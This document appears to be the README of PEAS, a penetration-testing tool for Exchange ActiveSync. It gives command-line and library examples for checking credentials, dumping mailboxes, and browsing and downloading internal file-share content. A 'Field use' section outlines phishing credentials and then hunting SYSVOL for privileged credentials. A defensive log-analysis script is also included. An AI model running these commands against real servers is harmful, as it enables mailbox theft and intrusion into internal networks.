PEAS: Access internal fileshares through Exchange ActiveSync

PEAS is a Python 2 library and command line application for running commands on an Exchange ActiveSync server. It was created in an intern research project to assist security assessments by allowing easy access to the functionality uncovered in the research, primarily Windows file share access from outside the domain. The code is hosted on GitHub under a GPLv2 license.

Usage

PEAS can be run as a command line application or imported as a library. Run peas --help for the latest options.

Installation

PEAS can be run as a module from its directory without additional downloads, as it contains its two dependencies (eas_client and pyActiveSync). It can also be installed using the following command:

python setup.py install

Check server

peas 10.207.7.100

Check credentials

peas --check -u target -p ChangeMe123 10.207.7.100

View emails

peas --emails -u target -p ChangeMe123 10.207.7.100

Save emails to directory

peas --emails -O emails -u target -p ChangeMe123 10.207.7.100

List file shares

peas --list-unc='\\test-server' -u target -p ChangeMe123 10.207.7.100

peas --list-unc='\\test-server\guestshare' -u target -p ChangeMe123 10.207.7.100

Note: Using an IP address or FQDN instead of a hostname in the UNC path is not known to work.

View file from file share

peas --dl-unc='\\test-server\guestshare\fileonguestshare.txt' -u target -p ChangeMe123 10.207.7.100

Save file from file share

peas --dl-unc='\\test-server\guestshare\fileonguestshare.txt' -o file.txt -u target -p ChangeMe123 10.207.7.100

As a library

# PEAS targets Python 2; the print_function import makes the print() calls
# below behave the same under Python 2 (without it, Python 2 prints a tuple).
from __future__ import print_function

import peas

# Create an instance of the PEAS client.
client = peas.Peas()

# Display the documentation for the PEAS client.
help(client)

# Disable certificate verification so self-signed certificates don't cause errors.
client.disable_certificate_verification()

# Set the credentials and server to connect to.
client.set_creds({
    'server': '10.207.7.100',
    'user': 'target',
    'password': 'ChangeMe123',
})

# Check the credentials are accepted.
print("Auth result:", client.check_auth())

# Retrieve a file share directory listing (the UNC path must use a hostname, see the note above).
listing = client.get_unc_listing(r'\\fictitious-dc\guestshare')
print(listing)

# Retrieve emails.
emails = client.extract_emails()
print(emails)

Implementation

PEAS acts as a wrapper for the pyActiveSync and py-eas-client libraries. These libraries have been modified to extend their functionality. For ease of use, they have been included in the PEAS source tree for now.

Depending on the backend library selected after creating a PEAS instance, helper functions are called for that backend library to deliver the functionality of the PEAS client methods. The file share access functionality has only been added to pyActiveSync and going forward there is no intention to extend py-eas-client.

Significant source files

Path                              Functionality
peas/__main__.py                  The command line application.
peas/peas.py                      The PEAS client class that exclusively defines the interface to PEAS.
peas/py_activesync_helper.py      The helper functions that control the interface to pyActiveSync.
peas/pyActiveSync/client          The pyActiveSync EAS command builders and parsers.

Field use of PEAS

PEAS can currently be used for two main attacks:

  • Extraction of mailboxes
  • Browsing and downloading files from internal fileshares

An example attack would see the operator obtaining a target's email credentials, likely through phishing. The tool could then be used for a mass download of emails from that user's account.

The emails could be parsed for UNC paths of interest and those fileshares examined. 

Alternatively, the NETLOGON and SYSVOL shares of the domain controller can be browsed for group policy preference files which may indicate fileshares of interest and potentially higher privileged credentials.
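Both attacks above leave a trail on the Exchange server: every EAS request is logged by IIS on the Microsoft-Server-ActiveSync virtual directory with the command name in the query string. The following script is an added example for defenders and is not part of PEAS. It parses IIS W3C log lines and flags a user/device pair that either issues the EAS commands through which the DocumentLibrary store is reached (Search and ItemOperations, per the MS-ASCMD specification) or produces an unusually high number of Sync requests, as a mass mailbox download does. The log lines, user names, device IDs and addresses are constructed placeholders, and the field list is one plausible IIS column selection; adjust the #Fields parsing to match your own logging configuration.

```python
from __future__ import print_function

from collections import Counter, defaultdict

try:
    from urllib.parse import parse_qs  # Python 3
except ImportError:
    from urlparse import parse_qs      # Python 2

# EAS commands that can reach a Windows file share through the
# DocumentLibrary store (MS-ASCMD): Search lists a UNC path and
# ItemOperations Fetch retrieves a file by its LinkId. Ordinary mail
# clients also use both (mailbox search, attachment fetch), so a hit
# is a triage signal rather than proof; the query string does not say
# which store the request targeted, that is only in the WBXML body.
SHARE_CAPABLE_COMMANDS = {"Search", "ItemOperations"}

# Constructed sample lines in IIS W3C format for the EAS virtual directory.
# Users, devices and addresses are placeholders, not real log data.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 8.5
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2016-03-01 09:00:01 POST /Microsoft-Server-ActiveSync Cmd=FolderSync&User=target&DeviceId=DEV0001&DeviceType=Placeholder target 203.0.113.5 200
2016-03-01 09:00:02 POST /Microsoft-Server-ActiveSync Cmd=Sync&User=target&DeviceId=DEV0001&DeviceType=Placeholder target 203.0.113.5 200
2016-03-01 09:00:03 POST /Microsoft-Server-ActiveSync Cmd=Sync&User=target&DeviceId=DEV0001&DeviceType=Placeholder target 203.0.113.5 200
2016-03-01 09:00:04 POST /Microsoft-Server-ActiveSync Cmd=Sync&User=target&DeviceId=DEV0001&DeviceType=Placeholder target 203.0.113.5 200
2016-03-01 09:00:05 POST /Microsoft-Server-ActiveSync Cmd=Sync&User=target&DeviceId=DEV0001&DeviceType=Placeholder target 203.0.113.5 200
2016-03-01 09:01:10 POST /Microsoft-Server-ActiveSync Cmd=Search&User=target&DeviceId=DEV0001&DeviceType=Placeholder target 203.0.113.5 200
2016-03-01 09:01:11 POST /Microsoft-Server-ActiveSync Cmd=ItemOperations&User=target&DeviceId=DEV0001&DeviceType=Placeholder target 203.0.113.5 200
2016-03-01 09:05:00 POST /Microsoft-Server-ActiveSync Cmd=Ping&User=alice&DeviceId=DEV0002&DeviceType=Placeholder alice 198.51.100.7 200
2016-03-01 09:05:30 POST /Microsoft-Server-ActiveSync Cmd=Sync&User=alice&DeviceId=DEV0002&DeviceType=Placeholder alice 198.51.100.7 200
"""


def parse_w3c(text):
    """Parse IIS W3C log text into a list of dicts keyed by the #Fields names."""
    fields = None
    records = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # skip lines that do not map onto the declared columns
        record = dict(zip(fields, values))
        # Flatten the EAS query string (Cmd, User, DeviceId, DeviceType).
        query = parse_qs(record.get("cs-uri-query", ""))
        record["cmd"] = query.get("Cmd", [""])[0]
        record["device_id"] = query.get("DeviceId", [""])[0]
        records.append(record)
    return records


def activity_by_device(records):
    """Count EAS commands per (user, device ID, client IP) triple."""
    counts = defaultdict(Counter)
    for r in records:
        if r.get("cs-uri-stem", "").lower() != "/microsoft-server-activesync":
            continue
        key = (r["cs-username"], r["device_id"], r["c-ip"])
        counts[key][r["cmd"]] += 1
    return counts


def find_suspicious(records, sync_threshold=50):
    """Return findings for devices that issue share-capable commands or
    an unusually high number of Sync requests in the examined log window."""
    findings = []
    for (user, device, ip), cmds in sorted(activity_by_device(records).items()):
        reasons = []
        used = sorted(c for c in cmds if c in SHARE_CAPABLE_COMMANDS)
        if used:
            reasons.append("share-capable commands: " + ", ".join(used))
        if cmds["Sync"] >= sync_threshold:
            reasons.append("high Sync volume: %d" % cmds["Sync"])
        if reasons:
            findings.append({"user": user, "device": device, "ip": ip, "reasons": reasons})
    return findings


if __name__ == "__main__":
    # A low threshold suits the short constructed sample; tune it to your baseline.
    for f in find_suspicious(parse_w3c(SAMPLE_LOG), sync_threshold=3):
        print("%s / %s from %s: %s" % (f["user"], f["device"], f["ip"], "; ".join(f["reasons"])))
```

A sensible follow-up for any flagged pair is to check whether the DeviceId has been seen for that user before, since the attacks described here are run from a newly enrolled client rather than the user's usual phone; that comparison needs a baseline of known devices and is left out of the example.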

Extending

To extend the functionality of PEAS, there is a four-step process:

  1. Create a builder and parser for the EAS command if it has not been implemented in pyActiveSync/client. Copying an existing source file for another command and then editing it has proved effective. The Microsoft EAS documentation describes the structure of the XML that must be created and parsed from the response.

  2. Create a helper function in py_activesync_helper.py that connects to the EAS server over HTTPS, builds and runs the command to achieve the desired functionality. Again, copying an existing function such as get_unc_listing can be effective.

  3. Create a method in the Peas class that calls the helper function to achieve the desired functionality. This is where PEAS would decide which backend helper function to call if py-eas-client was also an option.

  4. Add command line support for the feature to the PEAS application by editing peas/__main__.py. A new option should be added that when set, calls the method created in the previous step.

Limitations

PEAS has been tested on Kali 2.0 against Microsoft Exchange Server 2013 and 2016. The domain controller was Windows 2012 and the Exchange server was running on the same machine. Results with other configurations may vary.

py-eas-client support is limited to retrieving emails and causes a dependency on Twisted. It was included when the library was being evaluated but it makes sense to remove it from PEAS now, as all functionality can be provided by pyActiveSync.

The licence may be restrictive due to the inclusion of pyActiveSync, which uses the GPLv2.

The requirement to know the hostname of the target machine for file share access may impede enumeration.